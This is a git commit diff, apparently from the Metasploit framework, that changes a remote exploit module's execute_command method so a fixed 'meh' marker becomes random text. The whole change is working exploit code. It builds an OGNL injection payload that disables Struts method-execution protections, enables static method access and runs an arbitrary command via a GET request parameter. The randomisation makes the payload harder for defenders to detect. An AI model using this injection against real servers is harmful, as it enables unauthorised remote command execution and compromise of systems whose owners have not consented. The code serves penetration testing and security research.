randomize meh parameter
parent
a3fff5401f
commit
53fde675e7
|
@ -78,14 +78,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def execute_command(cmd)
|
||||
junk = Rex::Text.rand_text_alpha(6)
|
||||
inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
|
||||
inject << "= new java.lang.Boolean(true),#{cmd})('meh')"
|
||||
inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')"
|
||||
uri = normalize_uri(datastore['TARGETURI'])
|
||||
resp = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'version' => '1.1',
|
||||
'method' => 'GET',
|
||||
'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' }
|
||||
'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }
|
||||
})
|
||||
resp
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue